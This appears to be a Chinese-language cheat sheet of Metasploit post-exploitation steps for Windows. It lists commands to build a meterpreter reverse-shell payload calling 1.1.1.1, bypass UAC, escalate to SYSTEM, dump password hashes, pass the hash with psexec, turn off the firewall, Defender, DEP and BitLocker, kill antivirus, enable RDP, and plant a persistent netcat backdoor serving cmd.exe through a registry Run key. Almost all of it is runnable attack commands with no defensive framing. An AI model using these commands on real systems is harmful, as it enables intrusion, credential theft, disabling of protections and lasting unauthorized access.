后渗透阶段-提权、后门、域渗透

已经获得目标系统控制权后扩大战果
- 提权
- 信息收集
- 渗透内网
- 永久后门
基于已有session扩大战果
- msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o 1.exe

load priv
getsystem
- priv_elevate_getsystem:Operation failed:Access is denied.
绕过UAC限制（当前session有效）
- use exploit/windows/local/ask
- use exploit/windows/local/bypassuac
- use exploit/windows/local/bypassuac_injection
利用漏洞直接提权为system
- use exploit/windows/local/ms13_053_schlamperei
- use exploit/windows/local/ppr_flatten_rec
图形化界面
- set payload windows/vncinject/reverse_tcp
- set viewonly no
load priv->hashdump
psexec的pass the hash
- use exploit/windows/smb/psexec
- set smbpass hash
- 需要提前关闭UAC（是关闭不是绕过）
  - 通过cmd执行注册表修改
关闭windows防火墙
- 需要成为管理员或system权限
- netsh advfirewall set allprofiles state off
关闭windowsDefender
- net stop windefend
- net stop 服务名称
Bitlocker 磁盘加密
- manage-bde -off C:
- manage-bde -status C:
关闭DEP
- bcdedit.exe /set{current}nx AlwaysOff
杀死防病毒软件
- killav
- run post/windows/manage/killav
开启远程桌面服务
- run /post/windows/manage/enable_rdp
- run getgui -e
  - run getgui -u user -p pass
查看远程桌面
- screenshot
- use espia(load espia)->screengrab

注册表保存着windows几乎全部配置参数
- 如果修改不当，可直接造成系统崩溃
- 修改前完整备份注册表
- 某些注册表的修改是不可逆的
常见用途
- 修改、增加启动项
- 窃取存储与注册表中的机密信息
- 绕过文件型病毒查杀
用注册表添加NC后门服务（meterpreter）
- upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
- 查看启动项：reg enumkey -k HKLM\software\microsoft\windows\currentversion\run（这个路径是四个启动项路径之一）
- 在其中增加一条键值：reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d “C:windows\\system32\nc.exe -Ldp 444 -e cmd.exe”
添加防火墙规则
- execute -f cmd -i -H
- netsh firewall show opmode
- netsh firewall add portopening TCP 4444 “test” ENABLE ALL(注意名字换隐蔽性强的)
- shutdown -r -f -t 0
  - 需要关闭UAC，否则Access is denied.(5)
- nc 1.1.1.1 4444
  - 中文乱码，shell下chcp 65001
其它注册表项，google搜索registry quick find chart